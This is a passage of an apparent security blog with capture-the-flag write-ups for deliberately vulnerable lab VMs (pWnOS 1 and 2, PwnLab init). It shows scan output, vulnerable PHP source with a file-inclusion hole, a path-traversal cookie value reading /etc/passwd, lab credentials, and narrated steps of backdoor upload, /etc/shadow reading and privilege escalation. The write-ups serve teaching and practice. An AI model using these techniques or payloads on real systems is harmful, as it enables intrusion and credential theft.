<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
Great! So, let's try log in via SSH.<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhK_7l2fihjwHQU6HkUEoNhehd05YPefAxEoAnuiEt6i3zYkwDyaeVLNTgbNyUqItGN6tj3iwEIGZBOZzomSAw8bEk8YABWIu0pvWa7v6XmHyxZCvojfGLeas9Fc7GU07SzjRXsao110vk/s1600/ssh.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="116" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhK_7l2fihjwHQU6HkUEoNhehd05YPefAxEoAnuiEt6i3zYkwDyaeVLNTgbNyUqItGN6tj3iwEIGZBOZzomSAw8bEk8YABWIu0pvWa7v6XmHyxZCvojfGLeas9Fc7GU07SzjRXsao110vk/s640/ssh.png" width="640" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
Excellent! So, we have to find Private.doc.enc file and decrypt it!<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhdhnA8tMkOSn19x-0w3NGqCB4XbOqby9qoJgS6I7IFlVWf7yhUnrX_g3In6QZ8le17PWep5hIcQ3luKDqPTLizVHrxwoMwD85Zw2-hgFFJ_ZaVzwlOmmgYumsq01COWjmVCpAaEjpSME0/s1600/doc.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhdhnA8tMkOSn19x-0w3NGqCB4XbOqby9qoJgS6I7IFlVWf7yhUnrX_g3In6QZ8le17PWep5hIcQ3luKDqPTLizVHrxwoMwD85Zw2-hgFFJ_ZaVzwlOmmgYumsq01COWjmVCpAaEjpSME0/s1600/doc.png" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
OK, so let's decrypt it! Maybe in .bash_history will be juicy information for us? Because tskies user encrypted the Private.doc file.<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEixh-C5bt4sYXEjLBmbicIXawKEBQ4pt7V5ylZTQBULbBzGpTD_F2p4jydYbDYFNm2BFvGrFxM50gmgGAO8Q2MuNH1Bsx0ZzT08nxvY10vfvllKKcksyRebKSIXphZ8qXUej4WTYz8LX0g/s1600/bash.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="332" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEixh-C5bt4sYXEjLBmbicIXawKEBQ4pt7V5ylZTQBULbBzGpTD_F2p4jydYbDYFNm2BFvGrFxM50gmgGAO8Q2MuNH1Bsx0ZzT08nxvY10vfvllKKcksyRebKSIXphZ8qXUej4WTYz8LX0g/s640/bash.png" width="640" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
Good, we know command which encrypted Private.doc file.<br />
I decrypted the file and it presents engineers confidential doc :-)<br />
<br />
Game over<br />
<br />rgolebiowskihttp://www.blogger.com/profile/06575754454762912759noreply@blogger.comtag:blogger.com,1999:blog-3159890562902717913.post-38805885726164111592016-08-10T13:48:00.000+02:002016-08-10T13:48:04.531+02:00pWnOS v2Hello,<br />
The second version (and the latest) of pWnOS challenges.<br />
<br />
Scanning<br />
<blockquote class="tr_bq">
PORT STATE SERVICE VERSION<br /><b>22/tcp open ssh OpenSSH 5.8p1 Debian 1ubuntu3 (Ubuntu Linux; protocol 2.0)</b><br />| ssh-hostkey: <br />| 1024 85:d3:2b:01:09:42:7b:20:4e:30:03:6d:d1:8f:95:ff (DSA)<br />| 2048 30:7a:31:9a:1b:b8:17:e7:15:df:89:92:0e:cd:58:28 (RSA)<br />|_ 256 10:12:64:4b:7d:ff:6a:87:37:26:38:b1:44:9f:cf:5e (ECDSA)<br /><b>80/tcp open http Apache httpd 2.2.17 ((Ubuntu))</b><br />|_http-server-header: Apache/2.2.17 (Ubuntu)<br />|_http-title: Welcome to this Site!</blockquote>
OK, as always let's try from web application.<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgfbYnXRGL2OchaR3OC-YwdhVYUPhWvCHpzrpT3N8wMwNFCekrO701J_tUJUMBETCWJllPEIYz-b3F-KM3T15rHNJU3YTQfvMoBIxIY_AM5j0sZ-dLuf6femWu1MHe3xRijmWPa3UESNQg/s1600/web.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgfbYnXRGL2OchaR3OC-YwdhVYUPhWvCHpzrpT3N8wMwNFCekrO701J_tUJUMBETCWJllPEIYz-b3F-KM3T15rHNJU3YTQfvMoBIxIY_AM5j0sZ-dLuf6femWu1MHe3xRijmWPa3UESNQg/s1600/web.png" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
OK, maybe let's try register us to the web application. DirBuster found also blog directory<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhzWi8E_WYd0t82F2KyLnWCwXpWeIb-nPH5jhD8z09gQhDfy55U9rl_zsGYzGtSYFm-YdI1XlQekfZm_V6u1WffLfyzLW4d83YkfT1qmowBVKQ7PPpJ6mh0dFTo8HKQRZS1SOf3MP0auuo/s1600/blog.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="555" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhzWi8E_WYd0t82F2KyLnWCwXpWeIb-nPH5jhD8z09gQhDfy55U9rl_zsGYzGtSYFm-YdI1XlQekfZm_V6u1WffLfyzLW4d83YkfT1qmowBVKQ7PPpJ6mh0dFTo8HKQRZS1SOf3MP0auuo/s640/blog.png" width="640" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
Good, in the source code I have discovered that this is Simple PHP Blog 0.4.0 As far as I know, we can find effective exploit.<br />
I have use exploit and I have change credentials for known for me to blog and I have logged in. So, I have uploaded PHP backdoor and execute it from images directory.<br />
When I have got limited shell I found mysql connect PHP file, which contains valid credentials for root database. I have reused these credentials and I have got a root system.<br />
<br />
Game over!rgolebiowskihttp://www.blogger.com/profile/06575754454762912759noreply@blogger.comtag:blogger.com,1999:blog-3159890562902717913.post-48126623213596516812016-08-09T21:31:00.000+02:002016-08-10T08:52:05.902+02:00pWnOS 1Hi,<br />
"It's a linux virtual machine intentionally configured with exploitable services to provide you with a path to r00t. :) Currently, the virtual machine NIC is configured in bridged networking, so it will obtain a normal IP address on the network you are connected to. You can easily change this to NAT or Host Only if you desire. A quick ping sweep will show the IP address of the virtual machine."<br />
<br />
Scanning<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj8fNcWn4WyxCDjeMKzZDmf_nMxgzUptc5JK1LEX0UMx0eml8tDTrZ54LtHUHxmMolgivRO8O2PbcxPtseF05X7hcYguAwdHWlBWwK2mgkTtLEMxiWwSMySKzkYO87y7JKrzF7WoT7vx8U/s1600/nmap.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj8fNcWn4WyxCDjeMKzZDmf_nMxgzUptc5JK1LEX0UMx0eml8tDTrZ54LtHUHxmMolgivRO8O2PbcxPtseF05X7hcYguAwdHWlBWwK2mgkTtLEMxiWwSMySKzkYO87y7JKrzF7WoT7vx8U/s1600/nmap.png" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
Good, let's start from <b>80 HTTP</b> and then <b>10000 HTTP</b>.<br />
Default web page looks as below<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjzpxg237arsOgDLomOQU2ACFJPcEQF3Ig8nL1qNbQtZmLjv8IReTjGyDgB1IEU2V4ze-vPb2TVWis3TTXkrGy3wP4jAwGoEBaBPCwVMZQf03_BEBO7iirCShh_nfISeqssb1xjwFewB5M/s1600/def.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjzpxg237arsOgDLomOQU2ACFJPcEQF3Ig8nL1qNbQtZmLjv8IReTjGyDgB1IEU2V4ze-vPb2TVWis3TTXkrGy3wP4jAwGoEBaBPCwVMZQf03_BEBO7iirCShh_nfISeqssb1xjwFewB5M/s1600/def.png" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
OK, so let's click on Next button.<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhPLyFbVnRbgGcw1rirUZhPSOEDd-4hTNkr7fgexgMrdZLYcgfFw6y8jUsR4YPFBgyzxziI0BcL9iE2wWkrT0l8zCrzc9pRBx5drqTWeX9CbFwE1tqUXYNLshLNVJjB6D_zIkijxsLmBd0/s1600/web.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhPLyFbVnRbgGcw1rirUZhPSOEDd-4hTNkr7fgexgMrdZLYcgfFw6y8jUsR4YPFBgyzxziI0BcL9iE2wWkrT0l8zCrzc9pRBx5drqTWeX9CbFwE1tqUXYNLshLNVJjB6D_zIkijxsLmBd0/s1600/web.png" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
Hmmm, I don't know what is it, but it is some kind of help page. Let's run DirBuster.<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEitV9rojkQ1olAsFq66G84O2TyUYCt3Sqeii2JsFuv1FHSEMzFXlf8Dahqr-s28RVtzEhHLtwPxwh0rL-I8FsDGQA8n3-d-71EVAjFgjwUfuvTukPksaZabynCojUIqV5P1dQ9V26iC2dg/s1600/dirbu.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEitV9rojkQ1olAsFq66G84O2TyUYCt3Sqeii2JsFuv1FHSEMzFXlf8Dahqr-s28RVtzEhHLtwPxwh0rL-I8FsDGQA8n3-d-71EVAjFgjwUfuvTukPksaZabynCojUIqV5P1dQ9V26iC2dg/s1600/dirbu.png" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
I was trying log in to the phpmyadmin panel using default credentials but without success.<br />
Let's try do something with <b>10000 http</b>.<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj-GKmoKDOwRpqlkSL7XlXn9TKNmkeuA5tokruAfRcoSgjExH9czY8-RTgl31Q8AecS6B2uq5RZ8v2MXhRNUnWiXGEiOvSU41iSjWWU3HJWwKUOsMQjeEu856PhaPndehYTox6Bb9GtKVQ/s1600/webmin.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj-GKmoKDOwRpqlkSL7XlXn9TKNmkeuA5tokruAfRcoSgjExH9czY8-RTgl31Q8AecS6B2uq5RZ8v2MXhRNUnWiXGEiOvSU41iSjWWU3HJWwKUOsMQjeEu856PhaPndehYTox6Bb9GtKVQ/s1600/webmin.png" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
I was trying also log in using default credentials - without success as well. We know that Webmin has assigned several known exploits, so let's try use some of it.<br />
BINGO! I have found CVE <b>2017</b>.<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhim7EaxOSZLjJgGY_7BMeehfhEueUPv_s8dRqVwzf03VnlNEWV4QdCfZMSxtGN7fPwLYUefwzZS3zc-46yICD5RKbCp1-LFNtTPFXhqzI4vmSI4JPgC6x89L3O08MrKpg7I8Mv_qmar3I/s1600/exploit.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhim7EaxOSZLjJgGY_7BMeehfhEueUPv_s8dRqVwzf03VnlNEWV4QdCfZMSxtGN7fPwLYUefwzZS3zc-46yICD5RKbCp1-LFNtTPFXhqzI4vmSI4JPgC6x89L3O08MrKpg7I8Mv_qmar3I/s1600/exploit.png" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
There is now ass lines of /etc/passwd file. Let's try display /etc/shadow file.<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgTIy99C5-hg_TYJNO24KIricEP5Fb5Ng4JF3yW14LpBvN4cWlGU_ucMZoXq8JNOPuyFBBWv0PqG1hbFZ7_Ppc0_uSoeGrmKyfRYPB5HTyX7dwGsOVYT5mmf-SPhiK-lg961C7Vpjaz5kM/s1600/shadow.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgTIy99C5-hg_TYJNO24KIricEP5Fb5Ng4JF3yW14LpBvN4cWlGU_ucMZoXq8JNOPuyFBBWv0PqG1hbFZ7_Ppc0_uSoeGrmKyfRYPB5HTyX7dwGsOVYT5mmf-SPhiK-lg961C7Vpjaz5kM/s1600/shadow.png" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
Awesome! We can run John the Ripper now! Unfortunately it consumes a lot of time - too lot for me.<br />
I haven't idea, so I decided to perform some research about version of OpenSSH and I saw (unfortunately part of other solution) that it is vulnerable to CVE 2008-0166.<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh-FZYveB-QxaUBef-dqCEYenX9w8YFrzWqT-d2eln_qN-fENv9SY6LKrkoivIVdjiln8_zf93UOJNRcgytlwl49wV3vSj86RND4PKX9UCpWNrzirdv2pEDZdBWZtV5Kl-ihz_vLbRaUt0/s1600/obama.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="270" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh-FZYveB-QxaUBef-dqCEYenX9w8YFrzWqT-d2eln_qN-fENv9SY6LKrkoivIVdjiln8_zf93UOJNRcgytlwl49wV3vSj86RND4PKX9UCpWNrzirdv2pEDZdBWZtV5Kl-ihz_vLbRaUt0/s640/obama.png" width="640" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
Great! So, we have to find some way to escalate our privileges. I have found effective exlpoit and...<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjkMQZc-BAtFtTJbXQmNupGaoL0xcIAQ7aI1gBhf_pHfTwBV0KdXgGa68IeIfH-JiJBbp2yWRbA6pyM_9Ef09aAx7O1NrHOGjgnxu6rf20m5nVXX9J0aEQqn7G_w9zDiVL9pNqV6H-y_bg/s1600/root.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjkMQZc-BAtFtTJbXQmNupGaoL0xcIAQ7aI1gBhf_pHfTwBV0KdXgGa68IeIfH-JiJBbp2yWRbA6pyM_9Ef09aAx7O1NrHOGjgnxu6rf20m5nVXX9J0aEQqn7G_w9zDiVL9pNqV6H-y_bg/s1600/root.png" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
Game over!<br />
<br />
<b>Second attack scenario</b>.<br />
We can also get limited shell via Samba. So, we have to read <b>/etc/samba/passdb.tdb</b> and decrypt password for <b>vmware</b> username. After that we will <br />
be able to crack the password (we will get <b>h4ckm3</b>). So, now we can log in to the //UBUNTUVM/home directory using samba and get from home directory SSH public key.<br />
<br />rgolebiowskihttp://www.blogger.com/profile/06575754454762912759noreply@blogger.comtag:blogger.com,1999:blog-3159890562902717913.post-68690602022294558252016-08-09T15:15:00.001+02:002016-08-09T15:15:54.432+02:00PwnLab init challengeHello,<br />
<br />
"Wellcome to "PwnLab: init", my first Boot2Root virtual machine. Meant to be easy, I hope you enjoy it and maybe learn something.
The purpose of this CTF is to get root and read de flag."<br />
<br />
So, let's play with it<br />
Nmap scanning phase<br />
<blockquote class="tr_bq">
PORT STATE SERVICE VERSION<br />
<b>80/tcp open http Apache httpd 2.4.10 ((Debian))</b><br />
|_http-server-header: Apache/2.4.10 (Debian)<br />
|_http-title: PwnLab Intranet Image Hosting<br />
<b>111/tcp open rpcbind 2-4 (RPC #100000)</b><br />
| rpcinfo: <br />
| program version port/proto service<br />
| 100000 2,3,4 111/tcp rpcbind<br />
| 100000 2,3,4 111/udp rpcbind<br />
| 100024 1 40309/udp status<br />
|_ 100024 1 42225/tcp status<br />
<b>3306/tcp open mysql MySQL 5.5.47-0+deb8u1</b><br />
| mysql-info: <br />
| Protocol: 53<br />
| Version: .5.47-0+deb8u1<br />
| Thread ID: 38<br />
| Capabilities flags: 63487<br />
| Some Capabilities: Speaks41ProtocolOld, Support41Auth, LongPassword, Speaks41ProtocolNew, IgnoreSpaceBeforeParenthesis, SupportsCompression, IgnoreSigpipes, InteractiveClient, ODBCClient, SupportsTransactions, DontAllowDatabaseTableColumn, SupportsLoadDataLocal, FoundRows, ConnectWithDatabase, LongColumnFlag<br />
| Status: Autocommit<br />
|_ Salt: BWnFSNkP0;xm:veu@|p=<br />
<b>42225/tcp open status 1 (RPC #100024)</b></blockquote>
As always let's start from web application.<br />
Default Web page looks like a some kind of administrator panel.<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgnKWyQDRZNLx5k0mc7LFpGGdjfeygnjAd6moBGCY4CagzvvToRyStBb-2UNLXEBabbHe1cAKVk5OjJEtXtrJnRZQ3GAPeGeir7DIqrH7ImdO2RrmGnrfJiohFetwKh_Abjvns5v3cpZDU/s1600/default.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgnKWyQDRZNLx5k0mc7LFpGGdjfeygnjAd6moBGCY4CagzvvToRyStBb-2UNLXEBabbHe1cAKVk5OjJEtXtrJnRZQ3GAPeGeir7DIqrH7ImdO2RrmGnrfJiohFetwKh_Abjvns5v3cpZDU/s1600/default.png" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
We must be logged in if we want to upload some file. Let's try do something with <b>page</b> parameter.<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhdTkOEcukL3iD_Nd0YQEzO78Iw5TOS2gg1HEsIZzZGx5z7wTCDMzb2sjDo55ROWBPka_ElQDsjgTLkhlQCYbPtxNb4vkwQRw0NC8f2MLrR9ddt7Aso3sD9LleejqftNH2tW4B3fEctf2k/s1600/lfi.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="103" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhdTkOEcukL3iD_Nd0YQEzO78Iw5TOS2gg1HEsIZzZGx5z7wTCDMzb2sjDo55ROWBPka_ElQDsjgTLkhlQCYbPtxNb4vkwQRw0NC8f2MLrR9ddt7Aso3sD9LleejqftNH2tW4B3fEctf2k/s640/lfi.png" width="640" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
Great! So, le'ts try read something like a <b>config.php </b>file.<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgBUcwBt2AEZoYEfIYWShkhF09VaJr9lCIoqUyZa8ySCbObXTziKPAP4gXfYT9EQR4ONu8sVK6mm3WQGIQEvtuyb5c3Y3YGmETOad1-uBQKhzrSc8pVh0tx2cE412cR5lnomDRp_2SgCFg/s1600/config.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgBUcwBt2AEZoYEfIYWShkhF09VaJr9lCIoqUyZa8ySCbObXTziKPAP4gXfYT9EQR4ONu8sVK6mm3WQGIQEvtuyb5c3Y3YGmETOad1-uBQKhzrSc8pVh0tx2cE412cR5lnomDRp_2SgCFg/s1600/config.png" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
Excellent! We have retrieved MySQL credentials! Let's verify it.<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjssPwgF9GW4De-aUudx_WxkwjoFoQJLuIp1Ny2qOmRYJKKc3oWB_51ucvIfeZwrpX4r4cZPPp3KYWwYgeR3vpaVdIQaMkiSUpJ9jtqz0L5po-xxUp5cj1avrdD-w4iYW2Q5bFYJQ7XXvI/s1600/mysql.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjssPwgF9GW4De-aUudx_WxkwjoFoQJLuIp1Ny2qOmRYJKKc3oWB_51ucvIfeZwrpX4r4cZPPp3KYWwYgeR3vpaVdIQaMkiSUpJ9jtqz0L5po-xxUp5cj1avrdD-w4iYW2Q5bFYJQ7XXvI/s1600/mysql.png" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
Great! We have got three credentials - probably for our web application.<br />
These passwords looks like base64 encoded string.<br />
Valid credentials:<br />
<b>kent:JWzXuBJJNy</b><br />
<b>mike:SIfdsTEn6I</b><br />
<b>kane:iSv5Ym2GRo</b><br />
Before logging as one of the three users, let's try examine how looks <b>upload.php</b> file.<br />
<blockquote class="tr_bq">
<b> </b><?php<br />session_start();<br />if (!isset($_SESSION['user'])) { die('You must be log in.'); }<br />?><br /><html><br /> <body><br /> <form action='' method='post' enctype='multipart/form-data'><br /> <input type='file' name='file' id='file' /><br /> <input type='submit' name='submit' value='Upload'/><br /> </form><br /> </body><br /></html><br /><?php <br />if(isset($_POST['submit'])) {<br /> if ($_FILES['file']['error'] <= 0) {<br /> $filename = $_FILES['file']['name'];<br /> $filetype = $_FILES['file']['type'];<br /> $uploaddir = 'upload/';<br /><b> </b>$file_ext = strrchr($filename, '.');<br /> $imageinfo = getimagesize($_FILES['file']['tmp_name']);<br /> $whitelist = array(".jpg",".jpeg",".gif",".png"); <br /><br /> if (!(in_array($file_ext, $whitelist))) {<br /> die('Not allowed extension, please upload images only.');<br /> }<br /><br /> if(strpos($filetype,'image') === false) {<br /> die('Error 001');<br /> }<br /><br /> if($imageinfo['mime'] != 'image/gif' && $imageinfo['mime'] != 'image/jpeg' && $imageinfo['mime'] != 'image/jpg'&& $imageinfo['mime'] != 'image/png') {<br /> die('Error 002');<br /> }<br /><br /> if(substr_count($filetype, '/')>1){<br /> die('Error 003');<br /> }<br /><br /> $uploadfile = $uploaddir . md5(basename($_FILES['file']['name'])).$file_ext;<br /><br /> if (move_uploaded_file($_FILES['file']['tmp_name'], $uploadfile)) {<br /> echo "<img src=\"".$uploadfile."\"><br />";<br /> } else {<br /> die('Error 4');<br /> }<br /> }<br />}<br /><br />?></blockquote>
OK, we can see that we have to use <b>gif,jpg, jpeg</b> and <b>png </b>extensions. I was trying a lot upload some PHP code, but without success... Probably upload functionality has been created correctly (secure).<br />
Let's examine <b>index.php</b> file (I don't have more ideas).<br />
<blockquote class="tr_bq">
<?php<br />//Multilingual. Not implemented yet.<br />//setcookie("lang","en.lang.php");<br />if (isset($_COOKIE['lang']))<br />{<br /> include("lang/".$_COOKIE['lang']);<br />}<br />// Not implemented yet.<br />?><br /><html><br /><head><br /><title>PwnLab Intranet Image Hosting</title><br /></head><br /><body><br /><center><br /><img src="images/pwnlab.png"><br /><br />[ <a href="/">Home</a> ] [ <a href="?page=login">Login</a> ] [ <a href="?page=upload">Upload</a> ]<br /><hr/><br/><br /><?php<br /> if (isset($_GET['page']))<br /> {<br /> include($_GET['page'].".php");<br /> }<br /> else<br /> {<br /> echo "Use this server to upload and share image files inside the intranet";<br /> }<br />?><br /></center><br /></body><br /></html></blockquote>
We can see that <b>lang</b> is handled via <b>include</b> method, so maybe there is LFI?<br />
BINGO! I have removed PHPSESSIONID parameter and add lang=../../../../../../../etc/passwd.<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi13TtCEPS-rk-qZbGFV6cK0WTN0zJSUHiaG5gnn10-S5EvGs5hWg-dcDN_OrZOeSvvOeIy8W7I4kS7YFrKJBGjEPoHJUphQXW1eT1wsDPfUgfG4xcYwj1bx-LTyihcbKngl4J-w99U28o/s1600/lfi.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="124" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi13TtCEPS-rk-qZbGFV6cK0WTN0zJSUHiaG5gnn10-S5EvGs5hWg-dcDN_OrZOeSvvOeIy8W7I4kS7YFrKJBGjEPoHJUphQXW1eT1wsDPfUgfG4xcYwj1bx-LTyihcbKngl4J-w99U28o/s640/lfi.png" width="640" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
Great! So, we can upload <b>png</b> file with injected PHP script and run using LFI and lang Cookie!<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgTpZM8YrF2TBvpl5v1MiwvFsP_fmBrY8QB2VKzImOF869hkq7uuMJsQTp4eNYLBPOw4tPu5ErS0OtUSag_sgZ2swgNE_lORQ2ylXPZjRYRt5n4MSfrw9oZ4aHHYv6MshPinecrKB9rzfU/s1600/limited.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgTpZM8YrF2TBvpl5v1MiwvFsP_fmBrY8QB2VKzImOF869hkq7uuMJsQTp4eNYLBPOw4tPu5ErS0OtUSag_sgZ2swgNE_lORQ2ylXPZjRYRt5n4MSfrw9oZ4aHHYv6MshPinecrKB9rzfU/s1600/limited.png" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />Excellent! We have got limited shell. So, let's try retrieved credentials to up our privileges.<br />
BINGO! We can do that!<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi4okvJ1aJ28SY2YtlAiTR3XMWU1JjaqRli-sZUt7v8tihA2tDWXitXTxEZsnLq6MpYMIfaUaxAWxEdv9ePuHBii9f0ftuqbqM7iBbAUBTl5QtJFKbTIh_8ZWOW6W3yAVjDa8Cl_GNXCdY/s1600/shell.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi4okvJ1aJ28SY2YtlAiTR3XMWU1JjaqRli-sZUt7v8tihA2tDWXitXTxEZsnLq6MpYMIfaUaxAWxEdv9ePuHBii9f0ftuqbqM7iBbAUBTl5QtJFKbTIh_8ZWOW6W3yAVjDa8Cl_GNXCdY/s1600/shell.png" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
Great!<br />
<div class="separator" style="clear: both; text-align: center;">
